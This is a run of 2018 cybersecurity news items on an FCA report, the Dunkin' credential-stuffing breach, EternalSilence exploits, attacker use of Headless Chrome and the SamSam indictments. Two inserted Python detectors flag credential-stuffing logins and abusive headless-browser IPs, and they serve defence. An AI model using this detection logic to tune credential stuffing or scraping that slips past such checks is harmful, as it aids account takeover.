The report revealed that nearly 80% of respondents have problems understanding what information they hold and gaining visibility into third parties. Third-party failures accounted for 15% of operational incidents.

Identifying and managing high-risk staff and then educating employees with access to critical systems/sensitive data was another key concern.

FCA executive director of supervision, Megan Butler, said it is a worry that many firms still seem to be struggling with the cybersecurity basics.

“A third of firms do not perform regular cyber assessments. Most know where their data is, but describe it as a challenge to maintain that picture. Nearly half of firms do not upgrade or retire old IT systems in time. Only 56% say they can measure the effectiveness of their information asset controls,” she said.

“Only the largest firms have automated their detection systems to spot potential cyber-attacks. Smaller firms are generally relying on old-school, manual processes - or no processes at all. A problem if you need to respond to a fast-moving incident like a WannaCry or NotPetya attack.”

The most mature organizations are in non-bank payments, retail banking, and wholesale banking while those at the other end of the cybersecurity scale are in wholesale markets, retail investments, and retail lending.

However, the FCA reminded financial sector firms of their commitment to transparency, claiming there is evidence of under-reporting. It is in discussion with companies over 186 cases where the root cause of a cyber incident still hasn’t been revealed.

Butler urged firms to improve awareness programs as a matter of priority.

“At the moment, a lot of firms — 90% in fact — tell us that they operate a cyber awareness program. But a theme of today’s report is that businesses are struggling to identify and manage high risk staff, including those who deal with critical and sensitive data,” she said.

“By creating a positive security culture you can build a truly resilient business. You can use the eyes and ears of your firm to react and respond to threats quickly and accurately and hopefully deal with issues before they ever become an incident. Recognizing this success then helps to build and reinforce that secure culture.”

The FCA bared its regulatory teeth most recently by fining Tesco Bank over £16m for failings which led to hackers stealing millions from its customers in 2016.

Categories: Cyber Risk News

Attackers Run on Dunkin's DD Perks Rewards

Thu, 11/29/2018 - 16:14

Boston-based Dunkin’, the brand formerly known as Dunkin Donuts, has released a warning to its customers stating that DD Perks reward account holders were potentially hacked by a third party in a credential-stuffing attack. The hackers were trying to steal the rewards points to sell and trade them on the dark web.

The incident was discovered on October 31, 2018, by one of Dunkin’s security vendors, and it is believed that malicious third-party actors used credentials stolen from other breaches to access user accounts.

According to a statement shared with Infosecurity Magazine by a Dunkin’ spokesperson, “Dunkin’ Brands has issued notification letters to certain DD Perks account holders who may have experienced unauthorized access to their accounts.”

Additionally, the company's incident advisory warned that the attackers might have accessed the first and last names of impacted account holders, along with their email addresses and 16-digit DD Perks account number and their DD Perks QR code. Dunkin’ said it forced a password reset so that all potentially affected account holders would have to log out and use a new password to log back in to their accounts.

“Just when you thought that hackers could not come between you and your morning coffee, they get you right in the rewards points. NuData Security has found that 90% of cyberattacks start with some sort of automation, credential stuffing being a prominent one like the one perpetrated on Dunkin’,” said Ryan Wilk, VP of customer success for NuData Security, a Mastercard company.

“The software for credential stuffing is now so affordable that this type of attack is becoming accessible for almost anyone. What this means is that adversaries can automatically cycle through username and password pairs against login portals. This technique, known as credential stuffing, is a type of brute force attack whereby large sets of credentials are automatically inserted into login pages until a match with an existing account is found.”

While customers are advised to change their passwords, Wilk said this is only a temporary fix that fails to address the root of the problem. “One effective way to stop this type of attack is to implement security solutions that detect this sophisticated automated activity at login and other placements. By using technologies that include behavioral biometrics, automated activity is flagged at login before it can even test any credentials in the company's environment.”
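Detection logic for the login pattern Wilk describes, as an added example rather than Dunkin’s or NuData’s code. The log format, IP addresses, usernames and thresholds are constructed assumptions; the point is that stuffing shows up as many distinct accounts tried from one source, mostly failing, in a short window, which is different from one user mistyping a password.

```python
"""Flag credential-stuffing patterns in a login log.
Added example (not Dunkin's or NuData's code). Log format, IPs,
usernames and thresholds are constructed assumptions for illustration.
"""
from dataclasses import dataclass, field
from datetime import datetime, timedelta

# Constructed sample log: ISO timestamp, source IP, username, outcome.
# 203.0.113.7 tries one password across many accounts (stuffing);
# 198.51.100.4 is one user mistyping a password; 192.0.2.9 is clean.
SAMPLE_LOG = """\
2018-10-31T08:00:01 203.0.113.7 alice@example.com FAIL
2018-10-31T08:00:01 203.0.113.7 bob@example.com FAIL
2018-10-31T08:00:02 203.0.113.7 carol@example.com OK
2018-10-31T08:00:02 203.0.113.7 dave@example.com FAIL
2018-10-31T08:00:03 203.0.113.7 erin@example.com FAIL
2018-10-31T08:00:03 203.0.113.7 frank@example.com FAIL
2018-10-31T08:01:10 198.51.100.4 alice@example.com FAIL
2018-10-31T08:01:25 198.51.100.4 alice@example.com OK
2018-10-31T08:02:00 192.0.2.9 ivan@example.com OK
"""

@dataclass
class IpStats:
    first_seen: datetime
    last_seen: datetime
    attempts: int = 0
    failures: int = 0
    users: set = field(default_factory=set)      # distinct usernames tried
    successes: set = field(default_factory=set)  # accounts that logged in

def collect(lines):
    """Aggregate login attempts per source IP."""
    stats = {}
    for line in lines:
        if not line.strip():
            continue
        ts_text, ip, user, outcome = line.split()
        ts = datetime.fromisoformat(ts_text)
        s = stats.get(ip)
        if s is None:
            s = stats[ip] = IpStats(first_seen=ts, last_seen=ts)
        s.last_seen = max(s.last_seen, ts)
        s.attempts += 1
        s.users.add(user)
        if outcome == "OK":
            s.successes.add(user)
        else:
            s.failures += 1
    return stats

def detect_stuffing(lines, min_users=5, min_fail_ratio=0.8,
                    window=timedelta(minutes=10)):
    """Return {ip: [accounts that succeeded]} for IPs whose pattern matches
    credential stuffing: many distinct usernames, mostly failing, inside a
    short window. One user failing repeatedly is not flagged. The listed
    accounts are the ones that warrant a forced password reset."""
    flagged = {}
    for ip, s in collect(lines).items():
        if len(s.users) < min_users:
            continue
        if s.failures / s.attempts < min_fail_ratio:
            continue
        if s.last_seen - s.first_seen > window:
            continue
        flagged[ip] = sorted(s.successes)
    return flagged
```

Only the source that tried many accounts is flagged, and the one account it got into is the one to reset.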

Categories: Cyber Risk News

NSA Exploits Not Silent but Eternally Problematic

Thu, 11/29/2018 - 15:09

It’s been over a year since patches to protect against the leaked NSA exploits were released, yet Akamai has published research revealing the continued use of the Eternal family of exploits with evidence of a new version of the UPnProxy vulnerability targeting unpatched computers behind the router’s firewall.

In a new and widely distributed campaign, a family of injections dubbed EternalSilence has been leveraging the Eternal family of exploits. According to the research, exploiting the vulnerability allows attackers to burrow through the router, infecting individual computers on the network. The UPnProxy vulnerability affords attackers deeper insight into the devices they can target while strengthening the malicious network. 

Researchers discovered that more than 45,000 devices have been compromised, which they estimate puts over a million computers behind them waiting for commands, but they have not been able to gain insight into what happens post-injection. “They can only see the injections themselves and not the final payloads that would be directed at the machines exposed. However, a successful attack could yield a target rich environment, opening up the chance for such things as ransomware attacks, or a persistent foothold on the network,” Akamai’s Chad Seaman wrote.

Victims of the attack may very well not know that they have been targeted, particularly if their existing machines on the internet have already been segmented, the research said. As a result, any unpatched machines within the network will be easy targets.

“It was only a matter of time before the leaked NSA exploits would be used yet again for malicious purposes. It’s been over a year since these hacking tools first came on the scene, and even despite the number of successful attack methods that have since ensued, many organizations are still vulnerable to these exploits,” said Tyler Moffitt, senior threat research analyst, Webroot. “Unless properly patched, cyber-criminals are only going to continue using them in attacks for profit.

“There will always be zero-day vulnerabilities, but it’s worth noting that the vast majority of exploit attacks seen in the wild involve cyber-criminals targeting known vulnerabilities. These vulnerabilities have already been fixed by the vendor, but the fix has not been deployed and installed by the end user. There is without doubt a window of opportunity for cyber-criminals to take advantage.”

Categories: Cyber Risk News

Attackers Keen on Automated Browsers

Thu, 11/29/2018 - 14:35

Google Chrome has long been a popular web browser, but since the introduction of the headless mode functionality, the browser has grown in popularity not only among software engineers and testers but also with attackers, according to Imperva.

According to recently published research, "Headless Chrome: DevOps Love It, So Do Hackers, Here’s Why," the headless technique has grown more popular, particularly since Chrome introduced the functionality last year. Additionally, malicious actors are using the technique to target specific sites and exploit newly released vulnerabilities.

When Chrome is running without its “head,” or GUI, the latest full version of the Chrome browser is executed with the added perk of being able to control it programmatically on servers without dedicated graphics or display.

“In headless mode, it’s possible to run large scale web application tests, navigate from page to page without human intervention, confirm JavaScript functionality and generate reports,” wrote Imperva’s Dima Beckerman.

While DevOps appreciates the ability to benignly run large scale tests, attackers are able to leverage the same functionality for malicious purposes by evaluating JavaScript or emulating browser functionality.

“We observe more than 10K unique IP addresses daily performing scraping, sniping, carding, blackhat SEO and other types of malicious activity where JavaScript evaluation is necessary to perform the attack,” Beckerman said.

While automation in web browsers isn’t exclusive to Chrome, said Beckerman, “in comparison to other headless browsers and automation frameworks, Headless Chrome overtook the previous leader, PhantomJS, within a year of its release.”

Automated browser trends over the last year. Credit: Imperva

In addition to Chrome constantly adding new features and introducing new trends in web development, Headless Chrome has also become popular because of its support for a wide range of operating systems. DevOps appreciates Chrome’s convenient development tools and features, according to Imperva.

However, as much as DevOps has embraced Headless Chrome, “Chrome occupies the top of the 'attackers’ podium,' with half of the malicious traffic divided evenly between execution in headless and non-headless mode,” Beckerman wrote.

Because Headless Chrome is used for both malicious and legitimate purposes, Beckerman said blocking the automated browser should be done on a case-by-case basis, depending on the intent and behavior of each individual IP address.
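The per-IP, behaviour-driven decision Beckerman describes, as an added example and not Imperva’s code. The access-log format, addresses, endpoints and thresholds are constructed assumptions; the headless User-Agent token is treated only as a hint, because it is self-reported and trivially changed, so the verdict rests on what each IP actually does.

```python
"""Per-IP triage of automated-browser traffic.
Added example (not Imperva's code). Log format, IPs, paths and
thresholds are constructed assumptions.
"""
import re
from collections import defaultdict

# Constructed access-log lines: ip "METHOD path" status "user-agent".
# 198.51.100.20 is a headless health-check bot (benign automation);
# 203.0.113.50 is headless and hammers login/checkout endpoints;
# 192.0.2.3 is an ordinary desktop Chrome session.
HEADLESS_UA = "Mozilla/5.0 (X11; Linux x86_64) HeadlessChrome/70.0.3538.77"
DESKTOP_UA = "Mozilla/5.0 (Windows NT 10.0) Chrome/70.0.3538.77 Safari/537.36"
SAMPLE_ACCESS_LOG = [
    f'198.51.100.20 "GET /health" 200 "{HEADLESS_UA}"',
] * 5 + [
    f'203.0.113.50 "POST /login" 401 "{HEADLESS_UA}"',
    f'203.0.113.50 "POST /login" 401 "{HEADLESS_UA}"',
    f'203.0.113.50 "POST /login" 200 "{HEADLESS_UA}"',
    f'203.0.113.50 "POST /checkout" 200 "{HEADLESS_UA}"',
    f'203.0.113.50 "POST /checkout" 200 "{HEADLESS_UA}"',
    f'192.0.2.3 "GET /product/42" 200 "{DESKTOP_UA}"',
    f'192.0.2.3 "GET /cart" 200 "{DESKTOP_UA}"',
]
LINE_RE = re.compile(r'^(\S+) "(\S+) (\S+)" (\d{3}) "([^"]*)"$')
# Endpoints whose abuse by automation matters (login, payment, gift cards).
SENSITIVE_PREFIXES = ("/login", "/checkout", "/gift-card")

def classify_ips(lines, min_requests=5, sensitive_ratio=0.5):
    """Return {ip: verdict}. 'block' = headless and abusive behaviour;
    'challenge' = abusive behaviour with a normal UA (the UA string can be
    changed, so behaviour, not the UA, drives the decision);
    'monitor' = headless but benign so far; 'allow' = everything else."""
    per_ip = defaultdict(lambda: {"n": 0, "sensitive": 0, "headless": False})
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # malformed line: skip rather than guess
        ip, _method, path, _status, ua = m.groups()
        s = per_ip[ip]
        s["n"] += 1
        if path.startswith(SENSITIVE_PREFIXES):
            s["sensitive"] += 1
        if "HeadlessChrome" in ua:  # self-reported, so only a hint
            s["headless"] = True
    verdicts = {}
    for ip, s in per_ip.items():
        abusive = (s["n"] >= min_requests
                   and s["sensitive"] / s["n"] >= sensitive_ratio)
        if abusive and s["headless"]:
            verdicts[ip] = "block"
        elif abusive:
            verdicts[ip] = "challenge"
        elif s["headless"]:
            verdicts[ip] = "monitor"
        else:
            verdicts[ip] = "allow"
    return verdicts
```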

Categories: Cyber Risk News

US Indicts Two Iranians for SamSam Campaign Blitz

Thu, 11/29/2018 - 11:03

Two Iranian men have been indicted for a string of ransomware attacks over the past three years, causing $30m in losses to over 200 organizations, mainly in the US.

Faramarz Shahi Savandi, 34, and Mohammad Mehdi Shah Mansouri, 27, are accused of operating the infamous SamSam ransomware variant which targeted notable organizations including the Hollywood Presbyterian Medical Center, City of Atlanta, MedStar Health, Kansas Heart Hospital and the City of Newark.

The two are said to have made over $6m from their scheme to date, creating the first version of the malware in December 2015 before updating it in June and October 2017.

The attacks differed from many ransomware campaigns in being highly targeted, with the duo researching their victims, scanning for vulnerabilities and then striking outside of business hours to cause maximum disruption, all while disguising attacks as legitimate network traffic.

The two are charged with: one count of conspiracy to commit wire fraud; one count of conspiracy to commit fraud and related activity in connection with computers; two substantive counts of intentional damage to a protected computer; and two substantive counts of transmitting a demand in relation to damaging a protected computer.

They’re unlikely to be brought to justice, as the duo remain in Iran. However, the US Treasury has decided to impose sanctions on two more men, Ali Khorashadizadeh and Mohammad Ghorbaniyan, whose accounts are said to have been used to receive the stolen Bitcoin funds.

The move is more a statement of intent than anything else, as the two could simply open new cryptocurrency accounts elsewhere.

FireEye cybercrime analysis manager, Kimberly Goody, claimed the two may have targeted critical infrastructure organizations to improve their chances of receiving a pay-out.

“In our SamSam investigations, we observed activity consistent with that noted in the indictment, including the exploitation of external servers as well as updates to their initial infection vectors over time. Deploying ransomware post-compromise also allows attackers the ability to better understand victim environments and to both deploy ransomware payloads more broadly and to identify high-value systems – putting additional pressure on organizations to pay,” she added.

“It is also important to note that while the actors named in the indictment are associated with the SamSam ransomware, this may just be their most lucrative operation. We have some evidence to suggest that they were investigating the possibility of stealing card payment data, and we have also seen the deployment of cryptocurrency miners in victim environments.”

Sophos principal research scientist, Chester Wisniewski, argued that SamSam may be just the start of a new wave of targeted ransomware.

“Once in, they move laterally, working one step at a time to steal domain admin credentials, manipulate internal controls, disable back-ups and more to hand-deliver the ransomware,” he continued. “By the time most IT managers notice what’s happening, the damage is done. Other cyber-criminals have taken note, and in 2019 we expect copycat attacks.”

Categories: Cyber Risk News
